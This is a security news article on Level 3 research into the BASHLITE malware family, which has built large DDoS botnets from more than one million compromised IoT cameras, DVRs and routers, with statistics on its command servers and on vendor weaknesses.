More than one million consumer web-connected video cameras and DVRs are compromised by bot herders who use the devices for DDoS attacks, researchers say.
According to Level 3 Threat Research Labs, a small malware family that goes by the names Lizkebab, BASHLITE, Torlus and Gafgyt is behind a web of botnets carrying out the attacks.
“This research shocked us,” said Dale Drew, chief security officer at Level 3 Communications. “We picked fairly well-known and average botnets and challenged ourselves to find as many interesting things as we could. At a high level we were surprised. When we looked at BASHLITE malware, for example, we found it was tied to botnets far more organized and structured than we had previously thought.”
According to researchers, BASHLITE was responsible for a sliding scale of command and control servers and botnets that varied in size by the week. In July, they tracked C2s linked to the malware family communicating with only 74 bots. Later, researchers observed the malware family communicating with as many 120,000 bots. A closer analysis of the BASHLITE malware, Drew said, led to a large botnet with nearly 100 command-and-control servers. Some C2s exceeded 100 DDoS attacks a day with 75 percent of attacks lasting five minutes or less.
“What we learned is there is a false sense that some botnets that appear small don’t have the scope and scale to do much damage,” Drew said. “People have looked at these botnets and because they are very compartmentalized, they only seen parts of the botnet and not the entire connected picture,” Drew said.
Behind the malware push are hacking groups such as Lizard Squad and Poodle Corp which are increasingly targeting IoT devices to build botnets and conduct DDoS attacks and offer DDoS-as-a-Service, the firm wrote in a technical write-up on its research.
“After the attacker has gained access to the device, their tools do not bother to identify the architecture of the device they have compromised. Instead, they immediately execute both the ‘busybox wget’ and ‘wget’ commands to retrieve their DDoS bot payloads. Then they attempt to run multiple versions of the malware compiled for different architectures, until one executes,” the report reads.
Of the one million infected endpoint devices, 96 percent were IoT devices (of which 95 percent were cameras and DVRs), roughly 4 percent were home routers and less than 1 percent were tied to Linux servers. “This represents a drastic shift in the composition of botnets compared to the compromised server- and home router-based DDoS botnets we’ve seen in the past,” the researchers said.
Of the bots used in attacks, the majority were located in Taiwan, Brazil and Colombia. Security camera DVRs were a prime targets of attackers, researchers say, because they are considered low-hanging fruit. Many come configured with telnet and web interfaces enabled and use default credentials. “Most of these devices run some flavor of embedded Linux. When combined with the bandwidth required to stream video, they provide a potent class of DDoS bots,” the firm said.
Flashpoint, which helped Level 3 with the BASHLITE research, said the firm has been tracking 200 C2s tied to this malware family over the past several months. In contrast with more sophisticated malware, the C2 IPs associated with the campaign are hard-coded into the malware and often specify only a single IP address, making them easy targets for security researchers.
“This does not appear to be a concern for these bot herders, as it is easy to create a new C2 and re-compromise their bots,” researchers wrote.
As TCP attacks have decreased in popularity over the last month, the majority of the attacks launched are simple UDP and TCP floods, researchers note.
“While this malware supports spoofing of source addresses, we rarely see it employed. Some variants also support HTTP attacks, which make full connections to the victim webservers,” the report stated.
The majority of infected endpoints are tied to just a handful of companies that have implemented sloppy or nonexistent security standards into their IoT devices, Level 3 said. Singled out in the report was Dahua Technology – one of three vendors whose devices were attacked by the malware. Drew claims the company is preparing a patch for the flaw and will deploy it shortly.
This is also not the first time internet-accessible video cameras have been leveraged in a botnet attack. Earlier this year a much smaller botnet that consisted of 25,000 internet-enabled closed circuit TV devices was spotted by researchers at Sucuri. Another DDoS botnet leveraging 1,300 infected webcams was found by Arbor’s Security Engineering and Response Team (ASERT) earlier this year as well.